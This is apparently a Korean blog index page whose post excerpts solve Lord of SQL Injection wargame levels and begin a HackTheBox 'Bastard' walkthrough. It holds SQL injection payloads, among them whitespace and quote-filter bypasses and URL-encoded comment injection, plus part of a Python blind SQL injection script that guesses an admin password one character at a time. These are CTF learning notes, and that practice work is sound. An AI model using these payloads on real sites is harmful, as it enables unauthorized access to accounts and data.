전체 글345 wolfman prob _ . () 필터링 whitespace 안됨 whitespace 필터링 우회 "sql injection whitespace bypass" 구글링 whitespace(%20) -> %0a %0b %0c %0d %09 그럼 평소 하던대로 ' or id='admin'# '%0aor%0aid='admin'%23 으로 우회하면 된다. 2021. 10. 2. orc 이게 바로 blind sql injection 아예 pw를 알아내야하는 문제 같다.(비박스 책에서 addslashes는 우회할 수 없다고 했다.. 확실X) 1. 비밀번호 길이 알아내기 2. 비밀번호 한 글자씩 알아내기 import requests import threading def req_url(i): cookies={'PHPSESSID':''} for c in range(48, 123): response = requests.get("https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=' or id='admin' and substr(pw,"+str(i)+",1)=char("+str(c)+")%23",cookies=cookies.. 2021. 10. 1. goblin 정규식 prob _ . () 있으면 안되고 ' " ` 도 있으면 안된다. 그리고 지금 쿼리상 id='guest'로 되어있는데 이것을 admin으로 바꿔야 한다. 시도 guest의 no가 1인가보다. ?no=0 union select id from prob_goblin where id=0x61646d696e =>prob_에서 걸린다. ?no=0 union select id from 0x70726f625f676f626c696e where id=0x61646d696e => table명은 hex값으로 쓸 수 없다. 풀이 ?no=0 or id=0x61646d696e [**] or보다 and 연산이 우선순위가 높다. 2021. 10. 1. cobolt gremlin과 같은 수준이다. gremlin에서 가장 중요했던 것은 url encoding.. ?id=admin'#&pw=qwerty 이렇게 할 건데, 여기서 '#만 인코딩하면 된다. ?id=admin%27%23&pw=qwerty 2021. 10. 1. gremlin 정규식 해석하기 prob . _ () 가 하나라도 있으면 안된다. 해설 ' or 1=1# 로 익스가 가능할 것이라고 생각했다. 그런데 잘 되지 않았다. 주석이 query에 표시되지 않는다. 내가 생각했을 때는 url에서 인코딩하는 문자가 있다. 예를 들어 '(따옴표), 띄어쓰기 등등.. 근데 #은 인코딩되지 않는다. 또한 #은 url에서 따로 쓰임이 있다. 그래서 무시되는 것 같다. 때문에 내가 id argument에 넣을 값을 인코딩해서 넣어줘야 한다. (이때 =, &은 인코딩하면 안된다.) ?id=%27%20or%201%3D1%23&pw=qwerty 2021. 10. 1. bastard 롸업 정리 nmap 80 포트 - iis 7.5... http generator - drupal 7(이것에 주목해야하는 근거는?) 135 포트 - RPC 49154 포트 - RPC 10.10.10.9 접속 drupal? free, open source content management framework 아까 nmap 결과에서 http-robots.txt에서 CHANGELOG.txt가 눈에 띈다. 이 파일을 확인해본다. drupal의 상세 버전을 확인할 수 있다. (drupal 7.54) default credentials을 검색했지만 아무것도 나오지 않았다. 그렇다면, searchsploit drupal 7 왜 drupal 7.54를 검색하지 않았을까? 엄청 많은 결과가 나왔는데, 이게 딱 눈에 들어온다. 1.버전.. 2021. 10. 1. 이전 1 ··· 35 36 37 38 39 40 41 ··· 58 다음